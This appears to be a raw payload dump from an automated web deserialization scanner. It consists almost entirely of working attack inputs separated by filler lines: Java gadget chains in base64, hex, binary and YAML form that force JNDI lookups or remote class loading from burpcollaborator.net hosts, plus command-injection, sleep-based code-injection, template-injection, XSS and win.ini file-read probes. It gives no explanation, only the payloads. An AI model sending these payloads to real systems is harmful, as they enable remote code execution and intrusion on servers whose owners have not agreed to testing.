AQBqYXZhLnV0aWwuSGFzaE1h8AECAQFqZGsubmFzaG9ybi5pbnRlcm5hbC5vYmplY3RzLk5hdGl2ZVN0cmlu5wEAAAAAAAABAmNvbS5zdW4ueG1sLmludGVybmFsLmJpbmQudjIucnVudGltZS51bm1hcnNoYWxsZXIuQmFzZTY0RGF04QEAAQNqYXZheC5hY3RpdmF0aW9uLkRhdGFIYW5kbGXyAQAAAQRjb20uc3VuLnhtbC5pbnRlcm5hbC53cy5lbmNvZGluZy54bWwuWE1MTWVzc2FnZSRYbWxEYXRhU291cmPlAQAAAQVqYXZheC5jcnlwdG8uQ2lwaGVySW5wdXRTdHJlYe0BAQZqYXZheC5jcnlwdG8uTnVsbENpcGhl8gEAAAAAAAEHamF2YS5sYW5nLk9iamVj9AEAAAEIc3VuLm1pc2MuU2VydmljZSRMYXp5SXRlcmF0b/IBAQljb20uc3VuLmpuZGkudG9vbGtpdC5kaXIuTGF6eVNlYXJjaEVudW1lcmF0aW9uSW1w7AEBCQEAAAAAAAEKamF2YXgubmFtaW5nLmRpcmVjdG9yeS5TZWFyY2hSZXN1bPQBAAELamF2YXgubmFtaW5nLnNwaS5Db250aW51YXRpb25EaXJDb250ZXj0AQABDGphdmF4Lm5hbWluZy5DYW5ub3RQcm9jZWVkRXhjZXB0aW/uAQAAAQwPAAAAAAABDWphdmF4Lm5hbWluZy5SZWZlcmVuY+UBAQ5qYXZhLnV0aWwuVmVjdG/yAQABRnJlZGT5AckDaHR0cDovL3JmYTg1N25vdmlnNWY1MHRrZ3pscmZwcmFpZ2Q0Mi5idXJwY29sbGFib3JhdG9yLm5ldC8gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICABRm/vAAEBAQ9qYXZhLnV0aWwuQ29sbGVjdGlvbnMkVW5tb2RpZmlhYmxlUmFuZG9tQWNjZXNzTGlz9AEAAAAAAQFmb+8AARBqYXZheC5uYW1pbmcuZGlyZWN0b3J5LlNlYXJjaENvbnRyb2zzAQAAAAACAAAAAAABAAAAARFqYXZhLnV0aWwuVHJlZVNl9AEAAAAAAAAAAAEBAAESamF2YS5sYW5nLlByb2Nlc3NCdWlsZGVyJE51bGxJbnB1dFN0cmVh7QEAAAAAAAAAAAABE1tMamF2YS5hd3QuZGF0YXRyYW5zZmVyLkRhdGFGbGF2b3K7AQEAAAEBAwEBAwEBAw==
AAAA
BBBBB
g4y0''ajto
BBBBB
AAAA
java.util.HashMa�com.caucho.naming.QNam�javax.naming.spi.ContinuationDirContex�javax.naming.CannotProceedExceptio�javax.naming.Referenc�java.util.Vecto�Fredd��http://1suiih0y8stfsfd3xqcv4p21nstohd.burpcollaborator.net/ Fo�java.util.Hashtabl�java.util.ArrayLis�fo�ba�com.sun.org.apache.xpath.internal.objects.XStrin��맦
AAAA
BBBBB
AAAA
BBBBB
AAAA
BBBBB
AAAA
BBBBB
AAAA
BBBBB
AAAA
BBBBB
AAAA
BBBBB
AAAA
9akcw83pkxnugayg1wuao9awfnlo9ex6pugk3br0
AAAA
BBBBB
AAAA
BBBBB
AAAA
BBBBB
AAAA
BBBBB
{"@type":"Freddy"}
BBBBB
AAAA
BBBBB
AAAA
BBBBB
AAAA
BBBBB
AAAA
BBBBB
AAAA
BBBBB
AAAA
BBBBB
AAAA
BBBBB
AAAA
BBBBB
pm0midl286Aljsj5gfzf0
BBBBB
AAAA
BBBBB
AAAA
BBBBB
nyeaplwd1w\\lyylv8abfy
BBBBB
AAAA
BBBBB
AAAA
BBBBB
nyeaplwd1w\\lyylv8abfy
BBBBB
AAAA
BBBBB
AAAA
BBBBB
1enakmjhnk%418ljw11ms8s
BBBBB
AAAA
BBBBB
AAAA
BBBBB
1enakmjhnk%418ljw11ms8s
BBBBB
AAAA
BBBBB
AAAA
BBBBB
q693h57bfn��l6tayemrpm
BBBBB
AAAA
BBBBB
AAAA
BBBBB
AAAA
BBBBB
q693h57bfn��l6tayemrpm
BBBBB
[""]
BBBBB
AAAA
BBBBB
AAAA
BBBBB
AAAA{${sleep(20)}}
BBBBB
AAAA
BBBBB
ddd
BBBBB
AAAA
BBBBB
AAAA'.sleep(20).'
BBBBB
AAAA
BBBBB
AAAA
BBBBB
AAAA
BBBBB
AAAA
BBBBB
AAAA
BBBBB
AAAA'+sleep(20.to_i)+'
BBBBB
AAAA
BBBBB
AAAA
BBBBB
AAAA
BBBBB
AAAAniqyw%>u8hnc'/"
BBBBB
AAAA
BBBBB
AAAA
BBBBB
AAAA
BBBBB
AAAA%}akrge'/"
BBBBB
AAAA
BBBBB
AAAA
BBBBB
AAAA
BBBBB
AAAA
BBBBB
AAAA
EAAdY29tLnN1bi5yb3dzZXQuSmRiY1Jvd1NldEltcGwADmRhdGFTb3VyY2VOYW1lAgDIbGRhcDovL3N4dHpidDJwN21ya2hjMmFmcXl6ZXVsNDl2Zm8zZC5idXJwY29sbGFib3JhdG9yLm5ldC8gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAACmF1dG9Db21taXQBAQABMAIAAAABMQIAAAABMgIAAAABMwIAAAABNAIAAAABNQIAAAABNgIAAAABNwIAAAABOAIAAAABOQIAAAACMTACAAAAAjExAgAAAAIxMgIAAAACMTMCAAAAAjE0AgAAAAIxNQIAAAAACQ==
AAAA
BBBBB
fu61aqs8i6><
BBBBB
AAAA
BBBBB
AAAA
BBBBB
AAAA
BBBBB
AAAA
BBBBB
AAAA
BBBBB
AAAA
BBBBB'
AAAA
BBBBB
AAA
VVVV'
AAAA
DQ==
AAAA
BBBBB
cccc
ddddd'
c:\windows\win.ini
BBBBB
AAAA
gcom.mchange.v2.c3p0.WrapperConnectionPoolDataSource+userOverridesAsString�HexAsciiSerializedMap:aced00057372003d636f6d2e6d6368616e67652e76322e6e616d696e672e5265666572656e6365496e6469726563746f72245265666572656e636553657269616c697a6564621985d0d12ac2130200044c000b636f6e746578744e616d657400134c6a617661782f6e616d696e672f4e616d653b4c0003656e767400154c6a6176612f7574696c2f486173687461626c653b4c00046e616d6571007e00014c00097265666572656e63657400184c6a617661782f6e616d696e672f5265666572656e63653b7870707070737200166a617661782e6e616d696e672e5265666572656e6365e8c69ea2a8e98d090200044c000561646472737400124c6a6176612f7574696c2f566563746f723b4c000c636c617373466163746f72797400124c6a6176612f6c616e672f537472696e673b4c0014636c617373466163746f72794c6f636174696f6e71007e00074c0009636c6173734e616d6571007e00077870737200106a6176612e7574696c2e566563746f72d9977d5b803baf010300034900116361706163697479496e6372656d656e7449000c656c656d656e74436f756e745b000b656c656d656e74446174617400135b4c6a6176612f6c616e672f4f626a6563743b78700000000000000000757200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c02000078700000000a70707070707070707070787400064672656464797400c8687474703a2f2f64396e306d74766f7a69786a676975307774716e6567396464346a75376a2e62757270636f6c6c61626f7261746f722e6e65742f202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020740003466f6f;
AAAA
BBBBB'
AAAA
ChNnY29tLm1jaGFuZ2UudjIuYzNwMC5XcmFwcGVyQ29ubmVjdGlvblBvb2xEYXRhU291cmNlK3VzZXJPdmVycmlkZXNBc1N0cmluZwaXH0hleEFzY2lpU2VyaWFsaXplZE1hcDphY2VkMDAwNTczNzIwMDNkNjM2ZjZkMmU2ZDYzNjg2MTZlNjc2NTJlNzYzMjJlNmU2MTZkNjk2ZTY3MmU1MjY1NjY2NTcyNjU2ZTYzNjU0OTZlNjQ2OTcyNjU2Mzc0NmY3MjI0NTI2NTY2NjU3MjY1NmU2MzY1NTM2NTcyNjk2MTZjNjk3YTY1NjQ2MjE5ODVkMGQxMmFjMjEzMDIwMDA0NGMwMDBiNjM2ZjZlNzQ2NTc4NzQ0ZTYxNmQ2NTc0MDAxMzRjNmE2MTc2NjE3ODJmNmU2MTZkNjk2ZTY3MmY0ZTYxNmQ2NTNiNGMwMDAzNjU2ZTc2NzQwMDE1NGM2YTYxNzY2MTJmNzU3NDY5NmMyZjQ4NjE3MzY4NzQ2MTYyNmM2NTNiNGMwMDA0NmU2MTZkNjU3MTAwN2UwMDAxNGMwMDA5NzI2NTY2NjU3MjY1NmU2MzY1NzQwMDE4NGM2YTYxNzY2MTc4MmY2ZTYxNmQ2OTZlNjcyZjUyNjU2NjY1NzI2NTZlNjM2NTNiNzg3MDcwNzA3MDczNzIwMDE2NmE2MTc2NjE3ODJlNmU2MTZkNjk2ZTY3MmU1MjY1NjY2NTcyNjU2ZTYzNjVlOGM2OWVhMmE4ZTk4ZDA5MDIwMDA0NGMwMDA1NjE2NDY0NzI3Mzc0MDAxMjRjNmE2MTc2NjEyZjc1NzQ2OTZjMmY1NjY1NjM3NDZmNzIzYjRjMDAwYzYzNmM2MTczNzM0NjYxNjM3NDZmNzI3OTc0MDAxMjRjNmE2MTc2NjEyZjZjNjE2ZTY3MmY1Mzc0NzI2OTZlNjczYjRjMDAxNDYzNmM2MTczNzM0NjYxNjM3NDZmNzI3OTRjNmY2MzYxNzQ2OTZmNmU3MTAwN2UwMDA3NGMwMDA5NjM2YzYxNzM3MzRlNjE2ZDY1NzEwMDdlMDAwNzc4NzA3MzcyMDAxMDZhNjE3NjYxMmU3NTc0Njk2YzJlNTY2NTYzNzQ2ZjcyZDk5NzdkNWI4MDNiYWYwMTAzMDAwMzQ5MDAxMTYzNjE3MDYxNjM2OTc0Nzk0OTZlNjM3MjY1NmQ2NTZlNzQ0OTAwMGM2NTZjNjU2ZDY1NmU3NDQzNmY3NTZlNzQ1YjAwMGI2NTZjNjU2ZDY1NmU3NDQ0NjE3NDYxNzQwMDEzNWI0YzZhNjE3NjYxMmY2YzYxNmU2NzJmNGY2MjZhNjU2Mzc0M2I3ODcwMDAwMDAwMDAwMDAwMDAwMDc1NzIwMDEzNWI0YzZhNjE3NjYxMmU2YzYxNmU2NzJlNGY2MjZhNjU2Mzc0M2I5MGNlNTg5ZjEwNzMyOTZjMDIwMDAwNzg3MDAwMDAwMDBhNzA3MDcwNzA3MDcwNzA3MDcwNzA3ODc0MDAwNjQ2NzI2NTY0NjQ3OTc0MDBjODY4NzQ3NDcwM2EyZjJmNzkzNTM0NmM2OTY1NzIzOTc2MzM3NDM0NjMzMzcxNmM3MzY1NmQzODYxMzEzNTc5Mzk3MDY2NjczMzM1MmU2Mjc1NzI3MDYzNmY2YzZjNjE2MjZmNzI2MTc0NmY3MjJlNmU2NTc0MmYyMDIwMjAyMDIwMjAyMDIwMjAyMDIwMjAyMDIwMjAyMDIwMjAyMDIwMjAyMDIwMjAyMDIwMjAyMDIwMjAyMDIwMjAyMDIwMjAyMDIwMjAyMDIwMjAyMDIwMjAyMDIwMjAyMDIwMjAyMDIwMjAyMDIwMjAyMDIwMjAyMDIwMjAyMDIwMjAyMDIwMjAyMDIwMjAyMDIwMjAyMDIwMjAyMDIwMjAyMDIwMjAyMDIwMjAyMDIwMjAyMDIwMjAyMDIwMjAyMDIwMjAyMDIwMjAyMDIwMjAyMDIwMjAyMDIwMjAyMDIwMjAyMDIwMjAyMDIwMjAyMDIwMjAyMDIwMjAyMDIwMjAyMDIwMjAyMDIwMjAyMDIwMjAyMDIwMjA3NDAwMDM0NjZmNmY7
<h1>ASD<>
<h1>ASD<>
AAAA
�#;com.sun.rowset.JdbcRowSetImpldataSourceNameautoCommit0123456789101112131415�ldap://sa6fn8w30xyyhxvfx8r2fvasejkb80.burpcollaborator.net/
AAAA
BBBBB
AAAA
CoIjO2NvbS5zdW4ucm93c2V0LkpkYmNSb3dTZXRJbXBsHWRhdGFTb3VyY2VOYW1lFWF1dG9Db21taXQDMAMxAzIDMwM0AzUDNgM3AzgDOQUxMAUxMQUxMgUxMwUxNAUxNQaDEWxkYXA6Ly96Z2ptdGYyYTY0NDVuNDFtM2Z4OWwyZ3prcXFqZTguYnVycGNvbGxhYm9yYXRvci5uZXQvICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgAwYBBgEGAQYBBgEGAQYBBgEGAQYBBgEGAQYBBgEGAQYB
AAAA
BBBBB
AAAAπng -n 21 127.0.0.1&
BBBBB
AAAA
'
AAAA
BBBBB
AAAA
!!com.mchange.v2.c3p0.JndiRefForwardingDataSource jndiName: "ldap://839oqrmcazjhds2wxx0szk3ylprff4.burpcollaborator.net/" loginTimeout: 0
AAAA
set: ? !!org.apache.commons.configuration.ConfigurationMap [!!org.apache.commons.configuration.JNDIConfiguration [!!javax.naming.InitialContext [], "ldap://m1o2o5kq8dhvb60avby6xy1cj3pudj.burpcollaborator.net/"]]
AAAA
BBBBB
AAAA
!!com.sun.rowset.JdbcRowSetImpl dataSourceName: "ldap://rrm7eaavyi701bqflgobn3rh98f03p.burpcollaborator.net/" autoCommit: true
AAAA
BBBBB
AAAA
[!!org.eclipse.jetty.plus.jndi.Resource ["__/obj", !!javax.naming.Reference ["foo", "Freddy", "http://sa68xbtwhjq1kc9g4h7c64ais9y2mr.burpcollaborator.net/"]], !!org.eclipse.jetty.plus.jndi.Resource ["obj/test", !!java.lang.Object []]]
AAAA
!!javax.script.ScriptEngineManager [!!java.net.URLClassLoader [[!!java.net.URL ["http://l6s1t4ppdcmug5590a352x6bo2uwil.burpcollaborator.net/"]]]]
AAAA
set: ? !!org.springframework.aop.support.DefaultBeanFactoryPointcutAdvisor adviceBeanName: "ldap://mj92652qqdzvt6iadbg6fyjc137yvn.burpcollaborator.net/" beanFactory: !!org.springframework.jndi.support.SimpleJndiBeanFactory shareableResources: ["ldap://mj92652qqdzvt6iadbg6fyjc137yvn.burpcollaborator.net/"] ? !!org.springframework.aop.support.DefaultBeanFactoryPointcutAdvisor []
AAAA
BBBBB
AAAA
!!org.springframework.beans.factory.config.PropertyPathFactoryBean targetBeanName: "ldap://jf2z22ynmavsp3e798c3bvf9x03wrl.burpcollaborator.net/" propertyPath: foo beanFactory: !!org.springframework.jndi.support.SimpleJndiBeanFactory shareableResources: ["ldap://jf2z22ynmavsp3e798c3bvf9x03wrl.burpcollaborator.net/"]
AAAA
!!javax.management.BadAttributeValueExpException [!!org.apache.xbean.naming.context.ContextUtil$ReadOnlyBinding ["foo", !!javax.naming.Reference [foo, "Freddy", "http://p8y5v8rtfgoyi97d2e59418fq6w3ks.burpcollaborator.net/"], !!org.apache.xbean.naming.context.WritableContext []]]
AAAA
BBBBB
AAAA'
BBBBB
AAAA
BBBBB
AAAA
BBBBB
AAAA
BBBBB
AAAA
AQBqYXZhLnV0aWwuSGFzaE1h8AECAQFjb20uY2F1Y2hvLm5hbWluZy5RTmFt5QEBAmphdmF4Lm5hbWluZy5zcGkuQ29udGludWF0aW9uRGlyQ29udGV49AEAAQNqYXZheC5uYW1pbmcuQ2Fubm90UHJvY2VlZEV4Y2VwdGlv7gEAAAAAAAAAAAEEamF2YXgubmFtaW5nLlJlZmVyZW5j5QEBBWphdmEudXRpbC5WZWN0b/IBAAFGcmVkZPkByQNodHRwOi8vb25mNWQ0dmwzZm8ybjI4cXNkN2l6Y3hvaWZvY2MxLmJ1cnBjb2xsYWJvcmF0b3IubmV0LyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIAFGb+8AAAABBmphdmEudXRpbC5IYXNodGFibOUBAAEHamF2YS51dGlsLkFycmF5TGlz9AECAwFmb+8DAWJh8gEBAwEIY29tLnN1bi5vcmcuYXBhY2hlLnhwYXRoLmludGVybmFsLm9iamVjdHMuWFN0cmlu5wEDAYXrp6YPGgsAAQgP
AAAA
BBBBB
AAAA
BBBBB
AAAAoir1og1ozp
BBBBB
AAAA
java.util.HashMa�com.rometools.rome.feed.impl.EqualsBea�com.rometools.rome.feed.impl.ToStringBea�com.sun.rowset.JdbcRowSetImp���ldap://1dfi3hlytsefdfy3iqxvppn18seq2f.burpcollaborator.net/ �java.util.Vecto� java.util.Hashtabl�� fo�
AAAA
BBBBB
AAAA
BBBBB
AAAA
BBBBB
AAAA
AQBqYXZhLnV0aWwuSGFzaE1h8AECAQFjb20ucm9tZXRvb2xzLnJvbWUuZmVlZC5pbXBsLkVxdWFsc0JlYe4BAQECY29tLnJvbWV0b29scy5yb21lLmZlZWQuaW1wbC5Ub1N0cmluZ0JlYe4AAQIBAQEDY29tLnN1bi5yb3dzZXQuSmRiY1Jvd1NldEltcOwAAQMBAAAAAADgDwAByQNsZGFwOi8vZWkwdjh1cWJ5NWpzaXMzZ24zMjh1MnNlZDVqNDd0LmJ1cnBjb2xsYWJvcmF0b3IubmV0LyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIAHQDwABBGphdmEudXRpbC5WZWN0b/IBCgIBAgECAQIBAgECAQIBAgECAQIBBAAAAAABBWphdmEudXRpbC5IYXNodGFibOUBAAAAAQDYDwAAAAEEAQoDAWZv7wAAAAAAAAAAAAABAQMBAQMBAQM=
AAAA
BBBBB
AAAA
BBBBB
AAAAc59zxo0kqr><
BBBBB
AAAA
java.util.HashMa��org.springframework.aop.support.DefaultBeanFactoryPointcutAdvisorcalle��org.springframework.beans.factory.support.DefaultListableBeanFactoryjava.util.concurrent.ConcurrentHashMa�java.util.HashSe��org.springframework.beans.factory.support.SimpleAutowireCandidateResolverorg.springframework.beans.factory.support.RootBeanDefinitio�java.util.LinkedHashMa�java.lang.Objec� �org.springframework.beans.factory.config.ConstructorArgumentValues java.util.LinkedLis�ob�star�org.springframework.beans.factory.support.MethodOverride� org.springframework.beans.MutablePropertyValue� java.util.ArrayLis�� java.lang.Clas�org.springframework.beans.factory.BeanClassLoaderAwar�org.springframework.beans.factory.BeanFactoryAwar�org.springframework.beans.factory.BeanNameAwar��org.springframework.beans.factory.support.CglibSubclassingInstantiationStrategyorg.apache.commons.logging.impl.NoOpLo�java.util.LinkedHashSe�org.springframework.core.DefaultParameterNameDiscovere� �org.springframework.core.StandardReflectionParameterNameDiscoverer�org.springframework.core.LocalVariableTableParameterNameDiscovererjava.lang.ThreadLoca��� java.lang.ProcessBuilde� �ldap://zjmg9frwzqkdjd41oo3tvntzeqkq8f.burpcollaborator.net/ org.springframework.aop.TruePointcu�AB
AAAA
BBBBB
AAAA
BBBBB
AAAA
AQBqYXZhLnV0aWwuSGFzaE1h8AECAQHCAW9yZy5zcHJpbmdmcmFtZXdvcmsuYW9wLnN1cHBvcnQuRGVmYXVsdEJlYW5GYWN0b3J5UG9pbnRjdXRBZHZpc29yAQFjYWxsZfIBAsUBb3JnLnNwcmluZ2ZyYW1ld29yay5iZWFucy5mYWN0b3J5LnN1cHBvcnQuRGVmYXVsdExpc3RhYmxlQmVhbkZhY3RvcnkBAQNqYXZhLnV0aWwuY29uY3VycmVudC5Db25jdXJyZW50SGFzaE1h8AEAAQMBAAEBAQABBGphdmEudXRpbC5IYXNoU2X0AQABBcoBb3JnLnNwcmluZ2ZyYW1ld29yay5iZWFucy5mYWN0b3J5LnN1cHBvcnQuU2ltcGxlQXV0b3dpcmVDYW5kaWRhdGVSZXNvbHZlcgEAAQMBAQMEAQZvcmcuc3ByaW5nZnJhbWV3b3JrLmJlYW5zLmZhY3Rvcnkuc3VwcG9ydC5Sb290QmVhbkRlZmluaXRpb+4BAAEBB2phdmEudXRpbC5MaW5rZWRIYXNoTWHwAQABAAAAAQhqYXZhLmxhbmcuT2JqZWP0AQEJwwFvcmcuc3ByaW5nZnJhbWV3b3JrLmJlYW5zLmZhY3RvcnkuY29uZmlnLkNvbnN0cnVjdG9yQXJndW1lbnRWYWx1ZXMBAQpqYXZhLnV0aWwuTGlua2VkTGlz9AEAAQcBAAAAAAAAAAEBAAAAAW9i6gFzdGFy9AAAAAABAQtvcmcuc3ByaW5nZnJhbWV3b3JrLmJlYW5zLmZhY3Rvcnkuc3VwcG9ydC5NZXRob2RPdmVycmlkZfMBAAEEAQABAAEIAQAAAQxvcmcuc3ByaW5nZnJhbWV3b3JrLmJlYW5zLk11dGFibGVQcm9wZXJ0eVZhbHVl8wEAAAENamF2YS51dGlsLkFycmF5TGlz9AEAAAEHAQAAAAAAAAGBAAAAAQ0BAQMEAAENAQABAAEDAQAAAQABAAEDAQAAAQMBAAEHAQABAAEAAQoBAAEDAQABAwEAAQMBAAAAAAEEAQMBDmphdmEubGFuZy5DbGFz8wEBD29yZy5zcHJpbmdmcmFtZXdvcmsuYmVhbnMuZmFjdG9yeS5CZWFuQ2xhc3NMb2FkZXJBd2Fy5QABDgEBEG9yZy5zcHJpbmdmcmFtZXdvcmsuYmVhbnMuZmFjdG9yeS5CZWFuRmFjdG9yeUF3YXLlAAEOAQERb3JnLnNwcmluZ2ZyYW1ld29yay5iZWFucy5mYWN0b3J5LkJlYW5OYW1lQXdhcuUAAQQBAAEEAQABEtABb3JnLnNwcmluZ2ZyYW1ld29yay5iZWFucy5mYWN0b3J5LnN1cHBvcnQuQ2dsaWJTdWJjbGFzc2luZ0luc3RhbnRpYXRpb25TdHJhdGVneQEBE29yZy5hcGFjaGUuY29tbW9ucy5sb2dnaW5nLmltcGwuTm9PcExv5wEBFGphdmEudXRpbC5MaW5rZWRIYXNoU2X0AQABAwEAARVvcmcuc3ByaW5nZnJhbWV3b3JrLmNvcmUuRGVmYXVsdFBhcmFtZXRlck5hbWVEaXNjb3ZlcmXyAQEKAQIBFsMBb3JnLnNwcmluZ2ZyYW1ld29yay5jb3JlLlN0YW5kYXJkUmVmbGVjdGlvblBhcmFtZXRlck5hbWVEaXNjb3ZlcmVyAQEXwwFvcmcuc3ByaW5nZnJhbWV3b3JrLmNvcmUuTG9jYWxWYXJpYWJsZVRhYmxlUGFyYW1ldGVyTmFtZURpc2NvdmVyZXIBAQMBAAABFAEAARhqYXZhLmxhbmcuVGhyZWFkTG9jYewBndCiuAoBFAEAAQMBAAEHAQAAAAEDAQABAAEAAQMBAQMRARlqYXZhLmxhbmcuUHJvY2Vzc0J1aWxkZfIBAQ0BAQMByQNsZGFwOi8vbWEwMzAyaWpxZGIwYTB2b2ZidWdtYWttNWRiZXozLmJ1cnBjb2xsYWJvcmF0b3IubmV0LyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIAAAAAABBAEAAAAAAAABGm9yZy5zcHJpbmdmcmFtZXdvcmsuYW9wLlRydWVQb2ludGN19AEBAQMBAQEAAAABGkEBAUI=
AAAAc59zxo0kqr%3e%3c
BBBBB
AAAA
BBBBB
AAAA
java.util.HashMa�org.springframework.aop.target.HotSwappableTargetSourc��org.springframework.aop.aspectj.autoproxy.AspectJAwareAdvisorAutoProxyCreator$PartiallyComparableAdvisorHolderorg.springframework.aop.aspectj.AspectJPointcutAdviso�org.springframework.aop.aspectj.AspectJAroundAdvic��org.springframework.aop.aspectj.annotation.BeanFactoryAspectInstanceFactoryorg.springframework.jndi.support.SimpleJndiBeanFactor�org.springframework.jndi.JndiTemplat�org.apache.commons.logging.impl.NoOpLo� java.util.HashSe��ldap://wrrdhczt7nsaracywlbq3k1wmnspge.burpcollaborator.net/ java.lang.Objec�toStrin�com.sun.org.apache.xpath.internal.objects.XStrin��
AAAA
BBBBB
AAAA
BBBBB
AAAA
AQBqYXZhLnV0aWwuSGFzaE1h8AECAQFvcmcuc3ByaW5nZnJhbWV3b3JrLmFvcC50YXJnZXQuSG90U3dhcHBhYmxlVGFyZ2V0U291cmPlAQEC7wFvcmcuc3ByaW5nZnJhbWV3b3JrLmFvcC5hc3BlY3RqLmF1dG9wcm94eS5Bc3BlY3RKQXdhcmVBZHZpc29yQXV0b1Byb3h5Q3JlYXRvciRQYXJ0aWFsbHlDb21wYXJhYmxlQWR2aXNvckhvbGRlcgEBA29yZy5zcHJpbmdmcmFtZXdvcmsuYW9wLmFzcGVjdGouQXNwZWN0SlBvaW50Y3V0QWR2aXNv8gEBBG9yZy5zcHJpbmdmcmFtZXdvcmsuYW9wLmFzcGVjdGouQXNwZWN0SkFyb3VuZEFkdmlj5QEAAAABBcwBb3JnLnNwcmluZ2ZyYW1ld29yay5hb3AuYXNwZWN0ai5hbm5vdGF0aW9uLkJlYW5GYWN0b3J5QXNwZWN0SW5zdGFuY2VGYWN0b3J5AQABBm9yZy5zcHJpbmdmcmFtZXdvcmsuam5kaS5zdXBwb3J0LlNpbXBsZUpuZGlCZWFuRmFjdG9y+QEBB29yZy5zcHJpbmdmcmFtZXdvcmsuam5kaS5KbmRpVGVtcGxhdOUBAAEIb3JnLmFwYWNoZS5jb21tb25zLmxvZ2dpbmcuaW1wbC5Ob09wTG/nAQEIAQEBAAEAAQlqYXZhLnV0aWwuSGFzaFNl9AEBAwHJA2xkYXA6Ly90NzFheDlmcW5rODc3N3N2Y2lybmpoaHQyazhud2MuYnVycGNvbGxhYm9yYXRvci5uZXQvICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgAQABAA4AAAEBCmphdmEubGFuZy5PYmplY/QAAAAAAAABdG9TdHJpbucBAQAAAAAAAAEBAwEBAQELY29tLnN1bi5vcmcuYXBhY2hlLnhwYXRoLmludGVybmFsLm9iamVjdHMuWFN0cmlu5wEDAYXurKUAFxAAAQET
AAAA
BBBBB
AAAAc59zxo0kqr><
BBBBB
AAAA
java.util.HashMa�org.springframework.aop.target.HotSwappableTargetSourc�org.apache.xbean.naming.context.ContextUtil$ReadOnlyBindin�javax.naming.Referenc�java.util.Vecto�Fredd��http://0efh4gmxurfeeez2jpyuqoo09rfv3k.burpcollaborator.net/ fo�org.apache.xbean.naming.context.WritableContex� com.sun.org.apache.xpath.internal.objects.XStrin��덽
AAAA
BBBBB
AAAA
BBBBB
AAAA
AQBqYXZhLnV0aWwuSGFzaE1h8AECAQFvcmcuc3ByaW5nZnJhbWV3b3JrLmFvcC50YXJnZXQuSG90U3dhcHBhYmxlVGFyZ2V0U291cmPlAQECb3JnLmFwYWNoZS54YmVhbi5uYW1pbmcuY29udGV4dC5Db250ZXh0VXRpbCRSZWFkT25seUJpbmRpbucBAQNqYXZheC5uYW1pbmcuUmVmZXJlbmPlAQEEamF2YS51dGlsLlZlY3Rv8gEAAUZyZWRk+QHJA2h0dHA6Ly9ydXA4azcyb2FpdjV1NWZ0emdlbDZmNHJwaXZuamMuYnVycGNvbGxhYm9yYXRvci5uZXQvICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgAWZv7wABBW9yZy5hcGFjaGUueGJlYW4ubmFtaW5nLmNvbnRleHQuV3JpdGFibGVDb250ZXj0AQAAAAAAAAAAAAAAAAAAAAEACQEDBQEBAwEBAQEGY29tLnN1bi5vcmcuYXBhY2hlLnhwYXRoLmludGVybmFsLm9iamVjdHMuWFN0cmlu5wEDAYXrjb0SDQQAAQEL
AAAA
BBBBB
alert(1)
BBBBB
AAAA
BBBBB
AAAA
BBBBB
AAAA
AAAAAA==
AAAA
BBBBB
m69frxerab
BBBBB
AAAA
��srjava.util.PriorityQueue��0��?��IsizeL comparatortLjava/util/Comparator;xpsr+org.apache.commons.beanutils.BeanComparator㡈�s"�HL comparatorq~LpropertytLjava/lang/String;xpsr'java.util.Collections$ReverseComparatord��SNJ�xptdatabaseMetaDatawsrcom.sun.rowset.JdbcRowSetImpl�&�Is�LconntLjava/sql/Connection;L iMatchColumnstLjava/util/Vector;LpstLjava/sql/PreparedStatement;LresMDtLjava/sql/ResultSetMetaData;LrowsMDt%Ljavax/sql/rowset/RowSetMetaDataImpl;LrstLjava/sql/ResultSet;LstrMatchColumnsq~xrjavax.sql.rowset.BaseRowSetC��M±�IconcurrencyZescapeProcessingIfetchDirI fetchSizeI isolationI maxFieldSizeImaxRowsI queryTimeoutZreadOnlyI rowSetTypeZshowDeletedLURLq~LasciiStreamtLjava/io/InputStream;L binaryStreamq~L charStreamtLjava/io/Reader;Lcommandq~L dataSourceq~L listenersq~LmaptLjava/util/Map;LparamstLjava/util/Hashtable;L unicodeStreamq~xp���pppppt�ldap://cs8h6x457tz8eiujimi2xyvo7fd51u.burpcollaborator.net/ ppsrjava.util.Hashtable�%!J�F loadFactorI thresholdxp?@wxppsrjava.util.Vectorٗ}[�;�IcapacityIncrementI elementCount[elementDatat[Ljava/lang/Object;xp 